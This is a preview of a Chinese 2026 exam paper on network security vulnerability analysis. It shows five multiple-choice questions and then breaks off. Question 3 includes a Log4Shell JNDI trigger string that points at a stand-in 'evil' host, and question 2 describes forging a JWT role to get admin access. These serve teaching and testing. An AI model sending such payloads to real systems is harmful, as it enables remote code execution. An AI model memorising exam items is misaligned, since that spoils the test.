2026年事业编计算机类网络安全漏洞分析专项试卷.docxVIP

  • 1
  • 0
  • 约7.07千字
  • 约 20页
  • 2026-07-25 发布于四川
  • 举报

2026年事业编计算机类网络安全漏洞分析专项试卷.docx

2026年事业编计算机类网络安全漏洞分析专项试卷

一、单项选择题(每题1分,共20分。每题只有一个正确答案,请将正确选项的字母填在括号内)

1.在OWASPTop102021中,下列哪一类漏洞首次进入前十?

A.失效的访问控制

B.加密失败

C.不安全的设计

D.服务器端请求伪造(SSRF)

(?)

2.某Web应用使用JWT作为会话令牌,签名算法为`none`,攻击者通过修改payload中的`role`字段成功获得管理员权限。该漏洞属于:

A.跨站脚本(XSS)

B.不安全的反序列化

C.失效的访问控制

D.弱加密

(?)

3.下列关于Log4j2远程代码执行(CVE-2021-44228)的说法,错误的是:

A.漏洞根因是JNDI注入

B.仅影响Log4j1.x版本

C.攻击者可通过`${jndi:ldap://evil/a}`触发

D.2.15.0-rc1版本可被绕过

(?)

4.在Linux内核中,开启`kptr_restrict=0`会直接导致:

A.内核地址空间布局随机化(KASLR)失效

B.普通用户可读`/proc/kallsyms`中的内核符号地址

C.SMEP保护被关闭

D.SMAP保护被关闭

(?)

5.某HTTPS站点使用TLS1.3,握手阶段未发送`CertificateRequest`消息,则该站点:

A.一

文档评论(0)

1亿VIP精品文档

相关文档